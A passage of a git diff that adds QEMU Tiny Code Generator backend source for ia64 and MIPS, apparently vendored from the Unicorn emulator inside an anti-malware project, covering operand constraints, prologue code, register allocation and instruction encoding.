INDEX_op_xor_i64, { "r", "rI", "rI" } }, + + { INDEX_op_mul_i64, { "r", "rZ", "rZ" } }, + + { INDEX_op_sar_i64, { "r", "rZ", "ri" } }, + { INDEX_op_shl_i64, { "r", "rZ", "ri" } }, + { INDEX_op_shr_i64, { "r", "rZ", "ri" } }, + { INDEX_op_rotl_i64, { "r", "rZ", "ri" } }, + { INDEX_op_rotr_i64, { "r", "rZ", "ri" } }, + + { INDEX_op_ext8s_i64, { "r", "rZ"} }, + { INDEX_op_ext8u_i64, { "r", "rZ"} }, + { INDEX_op_ext16s_i64, { "r", "rZ"} }, + { INDEX_op_ext16u_i64, { "r", "rZ"} }, + { INDEX_op_ext32s_i64, { "r", "rZ"} }, + { INDEX_op_ext32u_i64, { "r", "rZ"} }, + + { INDEX_op_bswap16_i64, { "r", "rZ" } }, + { INDEX_op_bswap32_i64, { "r", "rZ" } }, + { INDEX_op_bswap64_i64, { "r", "rZ" } }, + + { INDEX_op_brcond_i64, { "rZ", "rZ" } }, + { INDEX_op_setcond_i64, { "r", "rZ", "rZ" } }, + { INDEX_op_movcond_i64, { "r", "rZ", "rZ", "rI", "rI" } }, + + { INDEX_op_deposit_i32, { "r", "rZ", "ri" } }, + { INDEX_op_deposit_i64, { "r", "rZ", "ri" } }, + + { INDEX_op_qemu_ld_i32, { "r", "r" } }, + { INDEX_op_qemu_ld_i64, { "r", "r" } }, + { INDEX_op_qemu_st_i32, { "SZ", "r" } }, + { INDEX_op_qemu_st_i64, { "SZ", "r" } }, + + { -1 }, +}; + +/* Generate global QEMU prologue and epilogue code */ +static void tcg_target_qemu_prologue(TCGContext *s) +{ + int frame_size; + + /* reserve some stack space */ + frame_size = TCG_STATIC_CALL_ARGS_SIZE + + CPU_TEMP_BUF_NLONGS * sizeof(long); + frame_size = (frame_size + TCG_TARGET_STACK_ALIGN - 1) & + ~(TCG_TARGET_STACK_ALIGN - 1); + tcg_set_frame(s, TCG_REG_CALL_STACK, TCG_STATIC_CALL_ARGS_SIZE, + CPU_TEMP_BUF_NLONGS * sizeof(long)); + + /* First emit adhoc function descriptor */ + *s->code_ptr = (tcg_insn_unit){ + (uint64_t)(s->code_ptr + 1), /* entry point */ + 0 /* skip gp */ + }; + s->code_ptr++; + + /* prologue */ + tcg_out_bundle(s, miI, + tcg_opc_m34(TCG_REG_P0, OPC_ALLOC_M34, + TCG_REG_R34, 32, 24, 0), + INSN_NOP_I, + tcg_opc_i21(TCG_REG_P0, OPC_MOV_I21, + TCG_REG_B6, TCG_REG_R33, 0)); + + /* ??? If GUEST_BASE < 0x200000, we could load the register via + an ADDL in the M slot of the next bundle. */ + if (GUEST_BASE != 0) { + tcg_out_bundle(s, mlx, + INSN_NOP_M, + tcg_opc_l2 (GUEST_BASE), + tcg_opc_x2 (TCG_REG_P0, OPC_MOVL_X2, + TCG_GUEST_BASE_REG, GUEST_BASE)); + tcg_regset_set_reg(s->reserved_regs, TCG_GUEST_BASE_REG); + } + + tcg_out_bundle(s, miB, + tcg_opc_a4 (TCG_REG_P0, OPC_ADDS_A4, + TCG_REG_R12, -frame_size, TCG_REG_R12), + tcg_opc_i22(TCG_REG_P0, OPC_MOV_I22, + TCG_REG_R33, TCG_REG_B0), + tcg_opc_b4 (TCG_REG_P0, OPC_BR_SPTK_MANY_B4, TCG_REG_B6)); + + /* epilogue */ + tb_ret_addr = s->code_ptr; + tcg_out_bundle(s, miI, + INSN_NOP_M, + tcg_opc_i21(TCG_REG_P0, OPC_MOV_I21, + TCG_REG_B0, TCG_REG_R33, 0), + tcg_opc_a4 (TCG_REG_P0, OPC_ADDS_A4, + TCG_REG_R12, frame_size, TCG_REG_R12)); + tcg_out_bundle(s, miB, + INSN_NOP_M, + tcg_opc_i26(TCG_REG_P0, OPC_MOV_I_I26, + TCG_REG_PFS, TCG_REG_R34), + tcg_opc_b4 (TCG_REG_P0, OPC_BR_RET_SPTK_MANY_B4, + TCG_REG_B0)); +} + +static void tcg_target_init(TCGContext *s) +{ + tcg_regset_set(s->tcg_target_available_regs[TCG_TYPE_I32], + 0xffffffffffffffffull); + tcg_regset_set(s->tcg_target_available_regs[TCG_TYPE_I64], + 0xffffffffffffffffull); + + tcg_regset_clear(s->tcg_target_call_clobber_regs); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R8); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R9); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R10); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R11); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R14); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R15); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R16); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R17); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R18); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R19); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R20); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R21); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R22); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R23); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R24); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R25); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R26); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R27); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R28); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R29); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R30); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R31); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R56); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R57); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R58); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R59); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R60); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R61); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R62); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R63); + + tcg_regset_clear(s->reserved_regs); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R0); /* zero register */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R1); /* global pointer */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R2); /* internal use */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R3); /* internal use */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R12); /* stack pointer */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R13); /* thread pointer */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R33); /* return address */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R34); /* PFS */ + + /* The following 4 are not in use, are call-saved, but *not* saved + by the prologue. Therefore we cannot use them without modifying + the prologue. There doesn't seem to be any good reason to use + these as opposed to the windowed registers. */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R4); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R5); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R6); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R7); + + tcg_add_target_add_op_defs(s, ia64_op_defs); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ia64/tcg-target.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ia64/tcg-target.h new file mode 100644 index 0000000..b8b2693 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/ia64/tcg-target.h @@ -0,0 +1,183 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2009-2010 Aurelien Jarno + * Based on i386/tcg-target.c - Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +#ifndef TCG_TARGET_IA64 +#define TCG_TARGET_IA64 1 + +#define TCG_TARGET_INSN_UNIT_SIZE 16 +typedef struct { + uint64_t QEMU_ALIGN(16, lo); + uint64_t hi; +} tcg_insn_unit; + +/* We only map the first 64 registers */ +#define TCG_TARGET_NB_REGS 64 +typedef enum { + TCG_REG_R0 = 0, + TCG_REG_R1, + TCG_REG_R2, + TCG_REG_R3, + TCG_REG_R4, + TCG_REG_R5, + TCG_REG_R6, + TCG_REG_R7, + TCG_REG_R8, + TCG_REG_R9, + TCG_REG_R10, + TCG_REG_R11, + TCG_REG_R12, + TCG_REG_R13, + TCG_REG_R14, + TCG_REG_R15, + TCG_REG_R16, + TCG_REG_R17, + TCG_REG_R18, + TCG_REG_R19, + TCG_REG_R20, + TCG_REG_R21, + TCG_REG_R22, + TCG_REG_R23, + TCG_REG_R24, + TCG_REG_R25, + TCG_REG_R26, + TCG_REG_R27, + TCG_REG_R28, + TCG_REG_R29, + TCG_REG_R30, + TCG_REG_R31, + TCG_REG_R32, + TCG_REG_R33, + TCG_REG_R34, + TCG_REG_R35, + TCG_REG_R36, + TCG_REG_R37, + TCG_REG_R38, + TCG_REG_R39, + TCG_REG_R40, + TCG_REG_R41, + TCG_REG_R42, + TCG_REG_R43, + TCG_REG_R44, + TCG_REG_R45, + TCG_REG_R46, + TCG_REG_R47, + TCG_REG_R48, + TCG_REG_R49, + TCG_REG_R50, + TCG_REG_R51, + TCG_REG_R52, + TCG_REG_R53, + TCG_REG_R54, + TCG_REG_R55, + TCG_REG_R56, + TCG_REG_R57, + TCG_REG_R58, + TCG_REG_R59, + TCG_REG_R60, + TCG_REG_R61, + TCG_REG_R62, + TCG_REG_R63, + + TCG_AREG0 = TCG_REG_R32, +} TCGReg; + +#define TCG_CT_CONST_ZERO 0x100 +#define TCG_CT_CONST_S22 0x200 + +/* used for function call generation */ +#define TCG_REG_CALL_STACK TCG_REG_R12 +#define TCG_TARGET_STACK_ALIGN 16 +#define TCG_TARGET_CALL_STACK_OFFSET 16 + +/* optional instructions */ +#define TCG_TARGET_HAS_div_i32 0 +#define TCG_TARGET_HAS_rem_i32 0 +#define TCG_TARGET_HAS_div_i64 0 +#define TCG_TARGET_HAS_rem_i64 0 +#define TCG_TARGET_HAS_andc_i32 1 +#define TCG_TARGET_HAS_andc_i64 1 +#define TCG_TARGET_HAS_bswap16_i32 1 +#define TCG_TARGET_HAS_bswap16_i64 1 +#define TCG_TARGET_HAS_bswap32_i32 1 +#define TCG_TARGET_HAS_bswap32_i64 1 +#define TCG_TARGET_HAS_bswap64_i64 1 +#define TCG_TARGET_HAS_eqv_i32 1 +#define TCG_TARGET_HAS_eqv_i64 1 +#define TCG_TARGET_HAS_ext8s_i32 1 +#define TCG_TARGET_HAS_ext16s_i32 1 +#define TCG_TARGET_HAS_ext8s_i64 1 +#define TCG_TARGET_HAS_ext16s_i64 1 +#define TCG_TARGET_HAS_ext32s_i64 1 +#define TCG_TARGET_HAS_ext8u_i32 1 +#define TCG_TARGET_HAS_ext16u_i32 1 +#define TCG_TARGET_HAS_ext8u_i64 1 +#define TCG_TARGET_HAS_ext16u_i64 1 +#define TCG_TARGET_HAS_ext32u_i64 1 +#define TCG_TARGET_HAS_nand_i32 1 +#define TCG_TARGET_HAS_nand_i64 1 +#define TCG_TARGET_HAS_nor_i32 1 +#define TCG_TARGET_HAS_nor_i64 1 +#define TCG_TARGET_HAS_orc_i32 1 +#define TCG_TARGET_HAS_orc_i64 1 +#define TCG_TARGET_HAS_rot_i32 1 +#define TCG_TARGET_HAS_rot_i64 1 +#define TCG_TARGET_HAS_movcond_i32 1 +#define TCG_TARGET_HAS_movcond_i64 1 +#define TCG_TARGET_HAS_deposit_i32 1 +#define TCG_TARGET_HAS_deposit_i64 1 +#define TCG_TARGET_HAS_add2_i32 0 +#define TCG_TARGET_HAS_add2_i64 0 +#define TCG_TARGET_HAS_sub2_i32 0 +#define TCG_TARGET_HAS_sub2_i64 0 +#define TCG_TARGET_HAS_mulu2_i32 0 +#define TCG_TARGET_HAS_mulu2_i64 0 +#define TCG_TARGET_HAS_muls2_i32 0 +#define TCG_TARGET_HAS_muls2_i64 0 +#define TCG_TARGET_HAS_muluh_i32 0 +#define TCG_TARGET_HAS_muluh_i64 0 +#define TCG_TARGET_HAS_mulsh_i32 0 +#define TCG_TARGET_HAS_mulsh_i64 0 +#define TCG_TARGET_HAS_trunc_shr_i32 0 + +#define TCG_TARGET_deposit_i32_valid(ofs, len) ((len) <= 16) +#define TCG_TARGET_deposit_i64_valid(ofs, len) ((len) <= 16) + +/* optional instructions automatically implemented */ +#define TCG_TARGET_HAS_neg_i32 0 /* sub r1, r0, r3 */ +#define TCG_TARGET_HAS_neg_i64 0 /* sub r1, r0, r3 */ +#define TCG_TARGET_HAS_not_i32 0 /* xor r1, -1, r3 */ +#define TCG_TARGET_HAS_not_i64 0 /* xor r1, -1, r3 */ + +static inline void flush_icache_range(uintptr_t start, uintptr_t stop) +{ + start = start & ~(32UL - 1UL); + stop = (stop + (32UL - 1UL)) & ~(32UL - 1UL); + + for (; start < stop; start += 32UL) { + asm volatile ("fc.i %0" :: "r" (start)); + } + asm volatile (";;sync.i;;srlz.i;;"); +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/mips/tcg-target.c b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/mips/tcg-target.c new file mode 100644 index 0000000..3b53bb7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/mips/tcg-target.c @@ -0,0 +1,1816 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008-2009 Arnaud Patard + * Copyright (c) 2009 Aurelien Jarno + * Based on i386/tcg-target.c - Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#include "tcg-be-ldst.h" + +#ifdef HOST_WORDS_BIGENDIAN +# define MIPS_BE 1 +#else +# define MIPS_BE 0 +#endif + +#define LO_OFF (MIPS_BE * 4) +#define HI_OFF (4 - LO_OFF) + +#ifndef NDEBUG +static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { + "zero", + "at", + "v0", + "v1", + "a0", + "a1", + "a2", + "a3", + "t0", + "t1", + "t2", + "t3", + "t4", + "t5", + "t6", + "t7", + "s0", + "s1", + "s2", + "s3", + "s4", + "s5", + "s6", + "s7", + "t8", + "t9", + "k0", + "k1", + "gp", + "sp", + "s8", + "ra", +}; +#endif + +#define TCG_TMP0 TCG_REG_AT +#define TCG_TMP1 TCG_REG_T9 + +/* check if we really need so many registers :P */ +static const TCGReg tcg_target_reg_alloc_order[] = { + /* Call saved registers. */ + TCG_REG_S0, + TCG_REG_S1, + TCG_REG_S2, + TCG_REG_S3, + TCG_REG_S4, + TCG_REG_S5, + TCG_REG_S6, + TCG_REG_S7, + TCG_REG_S8, + + /* Call clobbered registers. */ + TCG_REG_T0, + TCG_REG_T1, + TCG_REG_T2, + TCG_REG_T3, + TCG_REG_T4, + TCG_REG_T5, + TCG_REG_T6, + TCG_REG_T7, + TCG_REG_T8, + TCG_REG_T9, + TCG_REG_V1, + TCG_REG_V0, + + /* Argument registers, opposite order of allocation. */ + TCG_REG_A3, + TCG_REG_A2, + TCG_REG_A1, + TCG_REG_A0, +}; + +static const TCGReg tcg_target_call_iarg_regs[4] = { + TCG_REG_A0, + TCG_REG_A1, + TCG_REG_A2, + TCG_REG_A3 +}; + +static const TCGReg tcg_target_call_oarg_regs[2] = { + TCG_REG_V0, + TCG_REG_V1 +}; + +static tcg_insn_unit *tb_ret_addr; + +static inline uint32_t reloc_pc16_val(tcg_insn_unit *pc, tcg_insn_unit *target) +{ + /* Let the compiler perform the right-shift as part of the arithmetic. */ + ptrdiff_t disp = target - (pc + 1); + assert(disp == (int16_t)disp); + return disp & 0xffff; +} + +static inline void reloc_pc16(tcg_insn_unit *pc, tcg_insn_unit *target) +{ + *pc = deposit32(*pc, 0, 16, reloc_pc16_val(pc, target)); +} + +static inline uint32_t reloc_26_val(tcg_insn_unit *pc, tcg_insn_unit *target) +{ + assert((((uintptr_t)pc ^ (uintptr_t)target) & 0xf0000000) == 0); + return ((uintptr_t)target >> 2) & 0x3ffffff; +} + +static inline void reloc_26(tcg_insn_unit *pc, tcg_insn_unit *target) +{ + *pc = deposit32(*pc, 0, 26, reloc_26_val(pc, target)); +} + +static void patch_reloc(tcg_insn_unit *code_ptr, int type, + intptr_t value, intptr_t addend) +{ + assert(type == R_MIPS_PC16); + assert(addend == 0); + reloc_pc16(code_ptr, (tcg_insn_unit *)value); +} + +#define TCG_CT_CONST_ZERO 0x100 +#define TCG_CT_CONST_U16 0x200 /* Unsigned 16-bit: 0 - 0xffff. */ +#define TCG_CT_CONST_S16 0x400 /* Signed 16-bit: -32768 - 32767 */ +#define TCG_CT_CONST_P2M1 0x800 /* Power of 2 minus 1. */ +#define TCG_CT_CONST_N16 0x1000 /* "Negatable" 16-bit: -32767 - 32767 */ + +static inline bool is_p2m1(tcg_target_long val) +{ + return val && ((val + 1) & val) == 0; +} + +/* parse target specific constraints */ +static int target_parse_constraint(TCGArgConstraint *ct, const char **pct_str) +{ + const char *ct_str; + + ct_str = *pct_str; + switch(ct_str[0]) { + case 'r': + ct->ct |= TCG_CT_REG; + tcg_regset_set(ct->u.regs, 0xffffffff); + break; + case 'L': /* qemu_ld output arg constraint */ + ct->ct |= TCG_CT_REG; + tcg_regset_set(ct->u.regs, 0xffffffff); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_V0); + break; + case 'l': /* qemu_ld input arg constraint */ + ct->ct |= TCG_CT_REG; + tcg_regset_set(ct->u.regs, 0xffffffff); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_A0); +#if defined(CONFIG_SOFTMMU) + if (TARGET_LONG_BITS == 64) { + tcg_regset_reset_reg(ct->u.regs, TCG_REG_A2); + } +#endif + break; + case 'S': /* qemu_st constraint */ + ct->ct |= TCG_CT_REG; + tcg_regset_set(ct->u.regs, 0xffffffff); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_A0); +#if defined(CONFIG_SOFTMMU) + if (TARGET_LONG_BITS == 32) { + tcg_regset_reset_reg(ct->u.regs, TCG_REG_A1); + } else { + tcg_regset_reset_reg(ct->u.regs, TCG_REG_A2); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_A3); + } +#endif + break; + case 'I': + ct->ct |= TCG_CT_CONST_U16; + break; + case 'J': + ct->ct |= TCG_CT_CONST_S16; + break; + case 'K': + ct->ct |= TCG_CT_CONST_P2M1; + break; + case 'N': + ct->ct |= TCG_CT_CONST_N16; + break; + case 'Z': + /* We are cheating a bit here, using the fact that the register + ZERO is also the register number 0. Hence there is no need + to check for const_args in each instruction. */ + ct->ct |= TCG_CT_CONST_ZERO; + break; + default: + return -1; + } + ct_str++; + *pct_str = ct_str; + return 0; +} + +/* test if a constant matches the constraint */ +static inline int tcg_target_const_match(tcg_target_long val, TCGType type, + const TCGArgConstraint *arg_ct) +{ + int ct; + ct = arg_ct->ct; + if (ct & TCG_CT_CONST) { + return 1; + } else if ((ct & TCG_CT_CONST_ZERO) && val == 0) { + return 1; + } else if ((ct & TCG_CT_CONST_U16) && val == (uint16_t)val) { + return 1; + } else if ((ct & TCG_CT_CONST_S16) && val == (int16_t)val) { + return 1; + } else if ((ct & TCG_CT_CONST_N16) && val >= -32767 && val <= 32767) { + return 1; + } else if ((ct & TCG_CT_CONST_P2M1) + && use_mips32r2_instructions && is_p2m1(val)) { + return 1; + } + return 0; +} + +/* instruction opcodes */ +typedef enum { + OPC_J = 0x02 << 26, + OPC_JAL = 0x03 << 26, + OPC_BEQ = 0x04 << 26, + OPC_BNE = 0x05 << 26, + OPC_BLEZ = 0x06 << 26, + OPC_BGTZ = 0x07 << 26, + OPC_ADDIU = 0x09 << 26, + OPC_SLTI = 0x0A << 26, + OPC_SLTIU = 0x0B << 26, + OPC_ANDI = 0x0C << 26, + OPC_ORI = 0x0D << 26, + OPC_XORI = 0x0E << 26, + OPC_LUI = 0x0F << 26, + OPC_LB = 0x20 << 26, + OPC_LH = 0x21 << 26, + OPC_LW = 0x23 << 26, + OPC_LBU = 0x24 << 26, + OPC_LHU = 0x25 << 26, + OPC_LWU = 0x27 << 26, + OPC_SB = 0x28 << 26, + OPC_SH = 0x29 << 26, + OPC_SW = 0x2B << 26, + + OPC_SPECIAL = 0x00 << 26, + OPC_SLL = OPC_SPECIAL | 0x00, + OPC_SRL = OPC_SPECIAL | 0x02, + OPC_ROTR = OPC_SPECIAL | (0x01 << 21) | 0x02, + OPC_SRA = OPC_SPECIAL | 0x03, + OPC_SLLV = OPC_SPECIAL | 0x04, + OPC_SRLV = OPC_SPECIAL | 0x06, + OPC_ROTRV = OPC_SPECIAL | (0x01 << 6) | 0x06, + OPC_SRAV = OPC_SPECIAL | 0x07, + OPC_JR = OPC_SPECIAL | 0x08, + OPC_JALR = OPC_SPECIAL | 0x09, + OPC_MOVZ = OPC_SPECIAL | 0x0A, + OPC_MOVN = OPC_SPECIAL | 0x0B, + OPC_MFHI = OPC_SPECIAL | 0x10, + OPC_MFLO = OPC_SPECIAL | 0x12, + OPC_MULT = OPC_SPECIAL | 0x18, + OPC_MULTU = OPC_SPECIAL | 0x19, + OPC_DIV = OPC_SPECIAL | 0x1A, + OPC_DIVU = OPC_SPECIAL | 0x1B, + OPC_ADDU = OPC_SPECIAL | 0x21, + OPC_SUBU = OPC_SPECIAL | 0x23, + OPC_AND = OPC_SPECIAL | 0x24, + OPC_OR = OPC_SPECIAL | 0x25, + OPC_XOR = OPC_SPECIAL | 0x26, + OPC_NOR = OPC_SPECIAL | 0x27, + OPC_SLT = OPC_SPECIAL | 0x2A, + OPC_SLTU = OPC_SPECIAL | 0x2B, + + OPC_REGIMM = 0x01 << 26, + OPC_BLTZ = OPC_REGIMM | (0x00 << 16), + OPC_BGEZ = OPC_REGIMM | (0x01 << 16), + + OPC_SPECIAL2 = 0x1c << 26, + OPC_MUL = OPC_SPECIAL2 | 0x002, + + OPC_SPECIAL3 = 0x1f << 26, + OPC_EXT = OPC_SPECIAL3 | 0x000, + OPC_INS = OPC_SPECIAL3 | 0x004, + OPC_WSBH = OPC_SPECIAL3 | 0x0a0, + OPC_SEB = OPC_SPECIAL3 | 0x420, + OPC_SEH = OPC_SPECIAL3 | 0x620, +} MIPSInsn; + +/* + * Type reg + */ +static inline void tcg_out_opc_reg(TCGContext *s, MIPSInsn opc, + TCGReg rd, TCGReg rs, TCGReg rt) +{ + int32_t inst; + + inst = opc; + inst |= (rs & 0x1F) << 21; + inst |= (rt & 0x1F) << 16; + inst |= (rd & 0x1F) << 11; + tcg_out32(s, inst); +} + +/* + * Type immediate + */ +static inline void tcg_out_opc_imm(TCGContext *s, MIPSInsn opc, + TCGReg rt, TCGReg rs, TCGArg imm) +{ + int32_t inst; + + inst = opc; + inst |= (rs & 0x1F) << 21; + inst |= (rt & 0x1F) << 16; + inst |= (imm & 0xffff); + tcg_out32(s, inst); +} + +/* + * Type bitfield + */ +static inline void tcg_out_opc_bf(TCGContext *s, MIPSInsn opc, TCGReg rt, + TCGReg rs, int msb, int lsb) +{ + int32_t inst; + + inst = opc; + inst |= (rs & 0x1F) << 21; + inst |= (rt & 0x1F) << 16; + inst |= (msb & 0x1F) << 11; + inst |= (lsb & 0x1F) << 6; + tcg_out32(s, inst); +} + +/* + * Type branch + */ +static inline void tcg_out_opc_br(TCGContext *s, MIPSInsn opc, + TCGReg rt, TCGReg rs) +{ + /* We pay attention here to not modify the branch target by reading + the existing value and using it again. This ensure that caches and + memory are kept coherent during retranslation. */ + uint16_t offset = (uint16_t)*s->code_ptr; + + tcg_out_opc_imm(s, opc, rt, rs, offset); +} + +/* + * Type sa + */ +static inline void tcg_out_opc_sa(TCGContext *s, MIPSInsn opc, + TCGReg rd, TCGReg rt, TCGArg sa) +{ + int32_t inst; + + inst = opc; + inst |= (rt & 0x1F) << 16; + inst |= (rd & 0x1F) << 11; + inst |= (sa & 0x1F) << 6; + tcg_out32(s, inst); + +} + +/* + * Type jump. + * Returns true if the branch was in range and the insn was emitted. + */ +static bool tcg_out_opc_jmp(TCGContext *s, MIPSInsn opc, void *target) +{ + uintptr_t dest = (uintptr_t)target; + uintptr_t from = (uintptr_t)s->code_ptr + 4; + int32_t inst; + + /* The pc-region branch happens within the 256MB region of + the delay slot (thus the +4). */ + if ((from ^ dest) & -(1 << 28)) { + return false; + } + assert((dest & 3) == 0); + + inst = opc; + inst |= (dest >> 2) & 0x3ffffff; + tcg_out32(s, inst); + return true; +} + +static inline void tcg_out_nop(TCGContext *s) +{ + tcg_out32(s, 0); +} + +static inline void tcg_out_mov(TCGContext *s, TCGType type, + TCGReg ret, TCGReg arg) +{ + /* Simple reg-reg move, optimising out the 'do nothing' case */ + if (ret != arg) { + tcg_out_opc_reg(s, OPC_ADDU, ret, arg, TCG_REG_ZERO); + } +} + +static inline void tcg_out_movi(TCGContext *s, TCGType type, + TCGReg reg, tcg_target_long arg) +{ + if (arg == (int16_t)arg) { + tcg_out_opc_imm(s, OPC_ADDIU, reg, TCG_REG_ZERO, arg); + } else if (arg == (uint16_t)arg) { + tcg_out_opc_imm(s, OPC_ORI, reg, TCG_REG_ZERO, arg); + } else { + tcg_out_opc_imm(s, OPC_LUI, reg, TCG_REG_ZERO, arg >> 16); + if (arg & 0xffff) { + tcg_out_opc_imm(s, OPC_ORI, reg, reg, arg & 0xffff); + } + } +} + +static inline void tcg_out_bswap16(TCGContext *s, TCGReg ret, TCGReg arg) +{ + if (use_mips32r2_instructions) { + tcg_out_opc_reg(s, OPC_WSBH, ret, 0, arg); + } else { + /* ret and arg can't be register at */ + if (ret == TCG_TMP0 || arg == TCG_TMP0) { + tcg_abort(); + } + + tcg_out_opc_sa(s, OPC_SRL, TCG_TMP0, arg, 8); + tcg_out_opc_sa(s, OPC_SLL, ret, arg, 8); + tcg_out_opc_imm(s, OPC_ANDI, ret, ret, 0xff00); + tcg_out_opc_reg(s, OPC_OR, ret, ret, TCG_TMP0); + } +} + +static inline void tcg_out_bswap16s(TCGContext *s, TCGReg ret, TCGReg arg) +{ + if (use_mips32r2_instructions) { + tcg_out_opc_reg(s, OPC_WSBH, ret, 0, arg); + tcg_out_opc_reg(s, OPC_SEH, ret, 0, ret); + } else { + /* ret and arg can't be register at */ + if (ret == TCG_TMP0 || arg == TCG_TMP0) { + tcg_abort(); + } + + tcg_out_opc_sa(s, OPC_SRL, TCG_TMP0, arg, 8); + tcg_out_opc_sa(s, OPC_SLL, ret, arg, 24); + tcg_out_opc_sa(s, OPC_SRA, ret, ret, 16); + tcg_out_opc_reg(s, OPC_OR, ret, ret, TCG_TMP0); + } +} + +static inline void tcg_out_bswap32(TCGContext *s, TCGReg ret, TCGReg arg) +{ + if (use_mips32r2_instructions) { + tcg_out_opc_reg(s, OPC_WSBH, ret, 0, arg); + tcg_out_opc_sa(s, OPC_ROTR, ret, ret, 16); + } else { + /* ret and arg must be different and can't be register at */ + if (ret == arg || ret == TCG_TMP0 || arg == TCG_TMP0) { + tcg_abort(); + } + + tcg_out_opc_sa(s, OPC_SLL, ret, arg, 24); + + tcg_out_opc_sa(s, OPC_SRL, TCG_TMP0, arg, 24); + tcg_out_opc_reg(s, OPC_OR, ret, ret, TCG_TMP0); + + tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP0, arg, 0xff00); + 